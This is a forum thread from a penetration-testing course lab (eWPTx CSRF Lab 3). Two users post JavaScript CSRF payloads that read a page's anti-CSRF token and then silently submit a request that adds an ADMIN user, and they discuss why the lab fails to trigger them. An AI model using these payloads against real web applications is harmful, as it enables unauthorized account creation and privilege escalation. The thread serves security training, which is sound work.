eWPTx - CSRF3 Lab

mbekgi4-acde84e011b8 · July 3, 2022, 8:44pm

Hi there. I am doing CSRF Lab 3, and do not understand why my script won’t work. It keeps saying I need to add the token, but my script should’ve taken care of that

<script type="text/javascript">

function addUser(token)
{

     var url ="http://3.csrf.labs/add_user.php";
     var params ="name=Malice&surname=Smith&email=malice3%40hacker.site&role=ADMIN&submit&CSRFToken=" + token;

     var CSRF =new XMLHttpRequest();
     CSRF.open("POST", url, true);
     CSRF.withCredentials = 'true';
     CSRF.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

     CSRF.send(params);
}


// Extract the token 
var XHR =new XMLHttpRequest(); 
XHR.onreadystatechange =function(){ 

	if(XHR.readyState == 4){ 
  		var htmlSource = XHR.responseText; //The source of users.php 

		//Extract the token 
		var parser = new DOMParser().parseFromString(htmlSource, "text/html"); 
		var token = parser.getElementById('CSRFToken').value; 

		addUser(token); 
	} 
} 

XHR.open('GET', 'http://3.csrf.labs/users.php', true); 
XHR.send();
      
</script>

Please help

jxberrios-6ecd6de837 · April 5, 2024, 8:40pm

Hi there, the issue is not your script or the one provided by the lab, but the lab itself. According to the lab, the user Irma Galagos should perform actions to execute your script, but it doesn’t.

In my case, I am redoing the lab to see if I can finally get it to work but it doesn’t. I’ve run different iterations, from the one provided to my own and nothing. If you like, see if this one executes for you, but doubt it. Cheers!

<script type="text/javascript">
let url = "http://3.csrf.labs/";
function addUser(token) {
 
    let params = "name=Malice&surname=Smith&email=malice%40hacker.site&role=ADMIN&submit=CSRFToken=" + token;
 
    let req = new XMLHttpRequest();
    req.open('POST', url + "add_user.php", true);
 
    req.withCredentials = true;
 
    req.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    req.send(params);
}
 
let xhr = new XMLHttpRequest();
 
xhr.onreadystatechange = function() {
    if (xhr.readyState === 4) {
        let htmlSource = xhr.responseText; // The source of user.php
 
        let parser = new DOMParser().parseFromString(htmlSource, "text/html");
 
        let token = parser.getElementById("CSRFToken")?.value || parser.getElementsByTagName("input")[0]?.value;
 
        addUser(token);
    }
}
                                                                                                                      
xhr.open('GET', url + "users.php", true);
xhr.send();
</script>

Topic		Replies	Views
CSRF Lab 3 eWPTX Advanced Web Application Penetration Testing red , security , lab	1	305	April 5, 2024
Ewptx csrf lab referer header Advanced Penetration Testing red , ine , security , lab	1	273	June 27, 2023
CSRF Labs - CORS Advanced Web Application Penetration Testing red , lab	0	320	January 28, 2022
Authentication & Authorization Lab 2 Web Application Penetration Testing Professional red	5	501	November 17, 2021
Lab3 Authentication and Authorization sqlmap not detecting vulnerable param Web Application Penetration Testing Professional red	7	472	June 2, 2022

eWPTx - CSRF3 Lab

Related topics